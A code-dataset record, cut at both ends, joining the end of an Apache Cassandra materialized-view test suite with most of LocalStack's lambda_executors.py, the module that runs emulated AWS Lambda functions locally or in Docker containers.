@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(5)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
node1, node2, node3 = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) // processes
logger.debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
logger.debug("Writing data to base table")
for i in range(upper // 10):
self._do_row(insert1, i, num_partitions)
logger.debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug("Writing more data to base table")
for i in range(upper // 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
logger.debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
logger.debug("Finished writes, now verifying reads")
self._populate_rows()
threads = []
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = get_ip_from_node(node2)
t = threading.Thread(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
threads.append(t)
t.daemon = True
t.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
try:
mm = queues[i % processes].get(timeout=60)
except Empty as e:
pytest.skip("Failed to get range {range} within timeout from queue. {error}".format(range=i, error=str(e)))
if not mm.out() is None:
logger.debug("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
for thread in threads:
thread.join(timeout=300)
@since('3.0')
class TestMaterializedViewsLockcontention(Tester):
"""
Test materialized views lock contention.
@jira_ticket CASSANDRA-12689
@since 3.0
"""
def _prepare_cluster(self):
self.cluster.populate(1)
self.cluster.set_configuration_options({'enable_materialized_views': 'true'})
self.supports_v5_protocol = self.supports_v5_protocol(self.cluster.version())
self.protocol_version = 5 if self.supports_v5_protocol else 4
self.cluster.set_configuration_options(values={
'concurrent_materialized_view_writes': 1,
'concurrent_writes': 1,
})
self.nodes = list(self.cluster.nodes.values())
self.cluster.start(jvm_args=[
"-Dcassandra.test.fail_mv_locks_count=64"
])
session = self.patient_exclusive_cql_connection(self.nodes[0], protocol_version=self.protocol_version)
keyspace = "locktest"
session.execute("""
CREATE KEYSPACE IF NOT EXISTS {}
WITH replication = {{ 'class': 'SimpleStrategy', 'replication_factor': '1' }}
""".format(keyspace))
session.set_keyspace(keyspace)
session.execute(
"CREATE TABLE IF NOT EXISTS test (int1 int, int2 int, date timestamp, PRIMARY KEY (int1, int2))")
session.execute("""CREATE MATERIALIZED VIEW test_sorted_mv AS
SELECT int1, date, int2
FROM test
WHERE int1 IS NOT NULL AND date IS NOT NULL AND int2 IS NOT NULL
PRIMARY KEY (int1, date, int2)
WITH CLUSTERING ORDER BY (date DESC, int2 DESC)""")
return session
@since('3.0')
def test_mutations_dontblock(self):
session = self._prepare_cluster()
records = 100
records2 = 100
params = []
for x in range(records):
for y in range(records2):
params.append([x, y])
execute_concurrent_with_args(
session,
session.prepare('INSERT INTO test (int1, int2, date) VALUES (?, ?, toTimestamp(now()))'),
params
)
assert_one(session, "SELECT count(*) FROM test WHERE int1 = 1", [records2])
for node in self.nodes:
with JolokiaAgent(node) as jmx:
mutationStagePending = jmx.read_attribute(
make_mbean('metrics', type="ThreadPools", path='request', scope='MutationStage', name='PendingTasks'), "Value"
)
assert 0 == mutationStagePending, "Pending mutations: {}".format(mutationStagePending)
|
lambda_executors.py
|
import os
import re
import sys
import glob
import json
import time
import logging
import threading
import traceback
import subprocess
import six
import base64
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file, rm_rf, in_docker, long_uid,
now, to_str, to_bytes, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue
from localstack.utils.aws.dead_letter_queue import sqs_error_to_dead_letter_queue
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11, LAMBDA_RUNTIME_PROVIDED)
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = 'aws:sqs'
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# whether to use our custom Java executor, or the default from lambci
# TODO: deprecated, should be removed in the future
USE_CUSTOM_JAVA_EXECUTOR = False
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info('Determined main container target IP: %s' % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info('Unable to get IP address of main Docker container "%s": %s' %
(container_name, e))
# return main container IP, or fall back to Docker host (bridge IP, or host DNS address)
return DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
class InvocationResult(object):
def __init__(self, result, log_output=''):
if isinstance(result, InvocationResult):
raise Exception('Unexpected invocation result type: %s' % result)
self.result = result
self.log_output = log_output or ''
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
return result
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
lambda_result_to_destination(func_details, event, result, asynchronous, raised_error)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return InvocationResult(None, log_output='Lambda executed asynchronously.')
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
kwargs = {'stdin': True, 'inherit_env': True, 'asynchronous': True}
env_vars = env_vars or {}
is_provided = func_details.runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if func_details and is_provided and env_vars.get('DOCKER_LAMBDA_USE_STDIN') == '1':
# Note: certain "provided" runtimes (e.g., Rust programs) can block when we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
'PATH': env_vars.get('PATH') or os.environ.get('PATH', ''),
'AWS_LAMBDA_EVENT_BODY': to_str(event),
'DOCKER_LAMBDA_USE_STDIN': '1'
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop('AWS_LAMBDA_COGNITO_IDENTITY', None)
event = None
cmd = re.sub(r'(.*)(%s\s+(run|start))' % self._docker_cmd(), r'\1echo $AWS_LAMBDA_EVENT_BODY | \2', cmd)
process = run(cmd, env_vars=env_vars, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output), log_output, result)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
class ContainerInfo:
""" Contains basic information about a docker container. """
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment['LOCALSTACK_HOSTNAME'] = main_endpoint
environment['EDGE_PORT'] = str(config.EDGE_PORT)
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
environment['AWS_LAMBDA_COGNITO_IDENTITY'] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment['AWS_LAMBDA_CLIENT_CONTEXT'] = json.dumps(to_str(
base64.b64decode(to_bytes(context.client_context))))
# custom command to execute in the container
command = ''
events_file = ''
if USE_CUSTOM_JAVA_EXECUTOR and is_java_lambda(runtime):
# if running a Java Lambda with our custom executor, set up classpath arguments
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
events_file = '_lambda.events.%s.json' % short_uid()
save_file(os.path.join(lambda_cwd, events_file), event_body)
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, events_file))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
# clean up events file
events_file and os.path.exists(events_file) and rm_rf(events_file)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' -e EDGE_PORT="$EDGE_PORT"'
' %s' # env_vars
' %s' # network
' %s' # dns
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str,
env_vars_str, network_str, dns_str, docker_image)
LOG.debug(cmd)
run(cmd)
if not mount_volume:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .Config.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = '%s stop -t0 %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = '%s rm %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = get_free_tcp_port()
env_vars['DOCKER_LAMBDA_API_PORT'] = port
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # env
' %s' # network
' %s' # dns
' %s' # --rm flag
' %s %s' # image and command
')";'
'%s cp "%s/." "$CONTAINER_ID:/var/task"; '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port,
env_vars_string, network_str, dns_str, rm_flag,
docker_image, command,
docker_cmd, lambda_cwd,
docker_cmd)
else:
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s -v "%s":/var/task'
' %s'
' %s' # network
' %s' # dns
' %s' # --rm flag
' %s %s'
) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string,
network_str, dns_str, rm_flag, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
path_before = sys.path
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path = [lambda_cwd] + sys.path
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write('%s %s' % (e, traceback.format_exc()))
raise
finally:
sys.path = path_before
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (request_id, func_arn)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
log_output += '\nEND RequestId: %s' % request_id
log_output += '\nREPORT RequestId: %s Duration: %s ms' % (request_id, int((end_time - start_time) * 1000))
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info('Error executing Lambda "%s": %s %s' % (func_arn, error,
''.join(traceback.format_tb(error.__traceback__))))
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(.+:)?(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_runtime(cls, runtime):
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
